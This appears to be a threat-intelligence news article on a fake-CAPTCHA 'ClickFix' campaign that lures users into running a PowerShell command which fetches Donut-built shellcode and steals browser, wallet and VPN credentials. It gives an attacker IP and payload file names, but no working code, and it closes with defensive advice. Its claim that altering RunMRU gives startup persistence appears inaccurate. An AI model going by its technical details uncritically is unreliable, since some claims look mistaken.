A newly identified malware campaign is using counterfeit CAPTCHA pages to deceive users and deploy a sophisticated information-stealing tool. This campaign, first detected in early 2026, exhibits similarities to the ClickFix operation, which targeted restaurant booking systems in mid-2025.
Social Engineering Tactics Enhanced
The perpetrators have advanced their social engineering techniques, making it easier for them to bypass conventional security defenses and gain initial access to victims’ systems. The attack begins when a user visits a compromised site that displays a fraudulent CAPTCHA verification page. This page manipulates the user into copying a harmful PowerShell command to their clipboard and executing it manually.
By exploiting human interaction, this approach, known as the “ClickFix” technique, circumvents security mechanisms that typically examine file downloads rather than manual command executions. The command initiates a download from the attacker’s infrastructure, specifically the IP address 91.92.240.219, and verifies user actions via specific API calls before proceeding.
Detailed Analysis of Infection Process
Upon execution, the malicious script launches a multi-stage infection designed to extract sensitive information. The malware targets a broad range of applications, including over twenty-five web browsers, cryptocurrency wallets like MetaMask, and enterprise VPN configurations. Cybersecurity analysts have observed that the campaign checks for virtual environments and active security tools before data exfiltration.
The impact is profound, as attackers gain access to critical credentials and financial resources, enabling them to monetize compromised accounts or infiltrate deeper into corporate networks.
Stealth Techniques and Persistence
The malware employs advanced process injection methods to remain undetected on infected devices. Following the initial PowerShell execution, it retrieves a shellcode file named cptch.bin from the attacker’s servers. Analysts identified an operational security error when the attacker used the variable $finalPayload, which was flagged by Microsoft Defender. This shellcode, generated using the Donut framework, executes directly in memory.
To maintain persistence, the attackers alter the RunMRU registry key, ensuring the malicious PowerShell command is re-executed upon system startup. This persistence strategy grants long-term access and involves rotating payload filenames, such as cptchbuild.bin, to evade hash-based blocking mechanisms.
Organizations are advised to educate users about the dangers of executing commands from web pages. Security teams should monitor for unusual PowerShell activity and specific registry changes. Implementing endpoint detection rules that flag clipboard data reading by browser processes can help identify this threat early.
